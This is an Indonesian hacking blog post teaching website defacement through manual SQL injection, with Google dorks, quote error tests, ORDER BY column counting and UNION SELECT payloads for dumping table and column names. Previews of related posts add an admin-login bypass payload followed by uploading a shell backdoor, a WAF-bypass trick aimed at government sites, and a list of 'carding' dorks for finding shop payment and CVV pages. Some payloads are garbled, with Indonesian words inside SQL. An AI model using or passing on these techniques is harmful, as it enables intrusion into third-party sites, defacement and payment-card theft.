Langsung ke konten utama

Tutorial Deface Sql Injection Manual

Assalamuallaikum Wr.Wb

Selamat datang di blog pribadi saya yang sederhana ini hehehehe :D, Kali ini saya akan share tutorial deface dengan sql injection, apa itu sql injection? SQL Injection adalah teknik hacking yang ditujukan untuk menyerang database SQL server. yahh tanpa basa basi lagi kita mulai. pertama download hackbar for mozilla firefox, jika sudah lalu lanjut ke langkah berikutnya.

1. Menemukan kerentanan di situs SQL injection


Dorking :

- inurl:? index.php id =

- inurl:? admin.php id =


( KEMBANGIN LAGI DORKNYA CARANYA CARI DI GOOGLE )


copy dan paste salah satu script di Google seperti inurl:/ id = index.php

2. Pilih salah Satu Web


Contoh => www.target.com/index.php?id=1

3. Sekarang Anda harus menambahkan ( ') pada akhir URL
contoh => www.target.com/index.php?id=1 ' jika Anda mendapatkan error seperti You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1 berarti web itu rentan terhadap Sqli.
4. Sekarang kita harus mencari jumlah kolom

www.target.com/index.php?id=1 order by 10-- (ERROR)

www.target.com/index.php?id=1 order by 9-- (ERROR)

www.target.com/index.php?id=1 order by 8-- (ERROR)

www.target.com/index.php?id=1 order by 7-- (NO ERROR)

jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7

5. Sekarang kita harus menemukan kolom rentan


www.target.com/index.php?id=-1 union select 1,2,3,4,5,6,7--

jika menunjukkan angka 2 kolom maka rentan adalah 2

6. kita harus menemukan versi database


www.target.com/index.php?id-=1 union select 1,@@version,3,4,5,6,7--

Mengganti kolom rentan dengan "@@ version"

jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya

7.Sekarang menemukan nama database


www.target.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()–-

8. Sekarang kita harus mencari nama kolom

union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns where table_name=–-

dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBARyaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:

klik tombol SQL –> MySQL –> MySQL CHAR()

setelah itu akan muncul javaScript Aplication sebagai berikut: kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik
sehingga perintah menjadi:

www.target.com/index.php?id-=1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–
Setelah itu tekan Execute

Nah sekian tutorial dari saya kurang lebihnya mohon maaf :)

pasang iklan

Komentar

Posting Komentar

Postingan populer dari blog ini

Tutorial Deface Dengan Bypass Admin Login

Hai, Asalamuallaikum wr.wb, Kali ini saya akan memberikan tutorial deface dengan Bypass Admin login, Sama halnya dengan Sql Injection Bug ini memungkinkan attacker dapat Login sebagai admin dengan memasukkan beberapa perintah tertentu di dalam Form Login, Segala Tindakan yang tidak di inginkan bukan tanggung jawab penulis, Tutorial ini hanya sebagai pengetahuan saja .... 1. Google Dork. Langkah pertama yaitu dengan menggunakan Google Dork inurl:/ admin_login.php site: .com ( kembangin sendiri ) 2. Pilih salah satu website . Pilih salah satu website yang menurut anda vuln sehingga akan tampil form login admin. 3. Username dan Password. Kemudian isikan Username dan Password dengan '=''or' Jika berhasil nantinya kita akan di alihkan ke halaman Admin Dashboard sehingga anda bisa mencari bagian dari Form Upload untuk meng-Upload script deface atau Shell Backdoor kalian, dan jika gagal Cari target yang lain. Oke sekian tutorial sederhana dari saya, Asalamuall...

Tutorial Bypass Waf Sqli

Hallo gais ... pada tulisan singkat kali ini saya akan memberikan sedikit tutorial cara mengatasi 404 Forbiden dan error lainnya saat injet manual Sql Injection .. Tanpa basa basi lagi langsung saya saya berikan tutorial'nya. 1. Pertama kalian harus cari target vuln Sqli. Contoh: http://target.go.id/berita.php?id=28 Cara mengecek apakah target Vuln Sqli adalah anda tinggal menambahkan petik atas pada akhir url. Contoh: http://target.go.id/berita.php?id=28' dan jika blank atau terdapat error barti itu vuln sqli. 2. Lalu kalian masukkan perintah order by di belakang akhir url Contoh: http://target.go.id/berita.php?id=28'+order+by+15--+- Jika Error Forbidden atau yang lainnya barti anda harus membypass'nya /*50000...*/+/*50000...*/ atau bisa menggunakan /*12345...*/+/*12345...*/ 3. Lalu kalian masukkan perintah union select, Contoh:http://target.go.id/berita.php?id=-28'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+- Jika masih terdapat error ...

Dork Carding 2019

Hallo gais, Setelah lama tidak membuat artikel kali ini saya akan berbagi dork carding CC 2019. Di bawah ini adalah dork'nya ... Langsung sedot saja ya gais .. inurl:”.php?cid=” intext:”shop” view_details.php?id= inurl:”.php?cid=” intext:”payment_option” inurl:”.php?cid=” intext:”delivery_address” Products.php?id= description.php?id= productlist.asp?catalogid= inurl:”.php?cid=” intext:”My_cart” inurl:”.php?cid=” intext:”Payment_Gateway” inurl:”.php?cid=” intext:”Transaction_succesfull” inurl:”.php?cid=” intext:”shoping” inurl:”.php?cid=” intext:”otp” inurl:”.php?cid=” intext:”verified" Your_account_details.php?id= inurl:”.php?cid=” intext:”Gateway” your_orders.php?ID= inurl:”.php?cid=” intext:”Payment_Successfull” inurl:”.php?cid=” intext:”Order_Recieved” productdesc.asp?catalogid= inurl:”.php?cid=” intext:”will_be_delivered” inurl:”.php?cid=” intext:”keep_shoping” inurl:”.php?cid=” intext:”Cashback” inurl:”.php?cid=” intext:”CVV” inurl:”.php?cid...